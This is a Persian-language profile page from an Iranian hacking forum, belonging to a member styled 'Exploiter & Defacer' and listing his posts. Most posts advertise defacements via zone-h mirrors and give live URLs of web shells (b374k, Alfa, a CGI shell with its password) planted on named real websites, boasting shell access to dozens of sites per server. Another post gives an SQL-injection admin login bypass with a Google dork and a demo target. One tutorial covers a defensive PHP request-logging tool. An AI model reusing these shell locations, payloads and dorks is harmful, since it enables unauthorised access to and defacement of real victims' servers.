رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

ICG SO

Exploiter & Defacer
  • تعداد ارسال ها

    117
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    1

آخرین بار برد ICG SO در مرداد 17

ICG SO یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

1 Neutral

4 دنبال کننده

درباره ICG SO

  • تاریخ تولد ۹۶/۱۲/۱۴

Converted

  • Name
    ...
  • Main os
    Windows
  • Programming language
    خیر
  1. http://www.zone-h.org/mirror/id/32664992?hz=1 با عرض تسلیت ایام محرم
  2. سلام بله درست فرمودید لینک درست شد موفق باشید
  3. [ بسم الله الرحمن الرحیم ] [ Prevent Access To The Site By Reviewing Requests ] [ جلوگیری از نفوذ به سایت با بررسی درخواست های وارده ] +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ سلام و درود خدمت اعضای انجمن ایران سایبر قبل از شروع آموزش خواستم یه تبریک به مدیران و اعضای فعال تیم بگم که با تلاش های دوستان و سطح بالای انجمن فعلا انجمن ایران سایبر تنها انجمن فعال و مستقر بدون مشکل در بین دوستان و انجمن های دیگر هست با آرزوی موفقیت دیگر انجمن ها ... +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ لینک دانلود ابزار مورد نیاز : https://github.com/SpiderMate/B-XSSRF ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ یکی از دغدغه های فعلی که مدیران وب سایت ها دارند این هست که با توجه به پیشرفت روزانه تحلیلگران و رایج شدن و همچنین ایجاد دسترسی بسیار راحت به آسیب پذیری های سایت ها چگونه امنیت خود را تامین کنند روش های قدیمی اکثرا دیگر جواب گو نبوده و استفاده از روش های قدیمی همچون فایروال هایی بدون درخواست Update هفتگی و... خود یک حفره محسوب میشود استفاده از ابزار B-XSSRF این امکان را به شما میدهد که در صورت ارسال درخواست های مخرب آن ها را شناسایی کنید و IP های متخلف را برای جلوگیری از نفوذ از سرور Block کنید و یا حتی در صورت وجود آسیب پذیری در در صفحات وب می توانید آنها را پیدا و رفع کنید این ابزار با زبان php نوشته شده و دارای یک دیتابیس مستقل است که برای استفاده از این ابزار باید بخشی از فضای دیتابیس خود را برای ذخیره لاگ ها در اختیار ابزار قرار دهید که یکی از نقاط قوت این ابزار همین دیتابیس جدای آن میباشد نمونه : برای فعال کردن و پوشش دادن سایت خود توسط این ابزار در ابتدا وارد Directory صفحات وب که می خواهید امنیت آنها را کنترل کنید شوید سپس تمام فایل های ابزار دانلود شده توسط لینک بالای آموزش را در مسیر Directory خود قرار دهید سپس وارد phpmyadmin برای ایجاد یک Database شوید مسیر phpmyadmin به صورت پیشفرض : http://localhost/phpmyadmin نمونه: حالا بعد از ایجاد Database فایل SQL قرار داده شده در ابزر را در آن import کنید Database.sql بعد از انجام اینکار اطلاعات ورود به دیتابیس را در فایل db.php قرار دهید حالا میتوانید وارد index.php شوید و اطلاعات و Log ها را برای جلوگیری از نفوذ مشاهده و رفع نمایید برای مثال اگر میخواهید Log و در خواست های XSS را مشاهده کنید باید در صفحات خود کد زیر را قرار دهید: <embed src="https://site.com/dir/request.php> برای ورود به تنظیمات و مشاهده Log ها برای جلوگیری از نفوذ از طریق صفحات وب نیاز به Username و Password خواهید داشت که میتوانید آن ها را تغیر دهید اما به صورت پیشفرض یوزرنیم و پسورد به صورت زیر میباشد : Username: [email protected] Password: 123456 ++++++++++++++++++++++++++++++++++++++++++++ موفق باشید ... یا علی ...
  4. سلام چطور میتونم عضو تیم دیفیس سایت بشم؟
    1. ICG SO

      ICG SO

      سلام بخش قوانین سایت رو مطالعه بفرمایید توضیح کامل داده شده فعالیت خودتون رو شروع کنید کادر مدیریت روند فعالیت شما را مشاهده میکند اگر قابل قبول بود رنک مورد نظر رو میگیرید
  5. ICG SO

    Target Trainings

    Shell Access Sites on the server = 16 Good Luck ++++++++++++++++ Tnx: Pi.Hack [ For Target ] ++++++++++++++++ http://www.ommsteelindustries.com/admin/images/gallery_img/603387426b239ea7e08e4b903ff75285.php?y=/home/ssacindia/public_html/
  6. http://www.zone-h.org/mirror/id/31251884?hz=1
  7. ICG SO

    Seroch Server Admin Page Bypass

    https://cxsecurity.com/issue/WLB-2019040029 # Exploit Title : Seroch Server Admin Page Bypass # Google Dork : intext:"Powered and preserved by:Seroch Server Solution" # Discovered By : Danger BoY # Our Team : www.iran-cyber.net # Date : 2019-4-4 # Tested on : Win7 , Kali Linux # Admin Panel : Site.com/admin/login.php # Exploit : username : '=''or' password : '=''or' Demo : http://www.start.ac.in/admin/login.php
  8. http://www.zone-h.org/mirror/id/31251884
  9. ICG SO

    Target Trainings

    cgi sheller http://www.absoluteinteriorrestorations.com/30/cgi.pl [ PASSWORD: Admin ] Sym Folder http://www.absoluteinteriorrestorations.com/30/ Shell Access http://www.absoluteinteriorrestorations.com/Alfa.php [ بایپس ها انجام شده ]
  10. http://www.zone-h.org/mirror/id/32276072 در انتظار ظهور ...
  11. ICG SO

    Target Trainings

    http://faabee.com/images/clients/clients_116.php Shell Access access to 50 sites on the server
  12. http://zone-h.org/mirror/id/30866890?hz=1
  13. ICG SO

    Target Trainings

    Windows Server Shell Access 56 = Sites on server http://www.spm.com.br/portal/Admin/fotos/b347k.php
  14. ICG SO

    Target Trainings

    Shell Access http://msmeresearch.com/admin/news/b347k.php

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...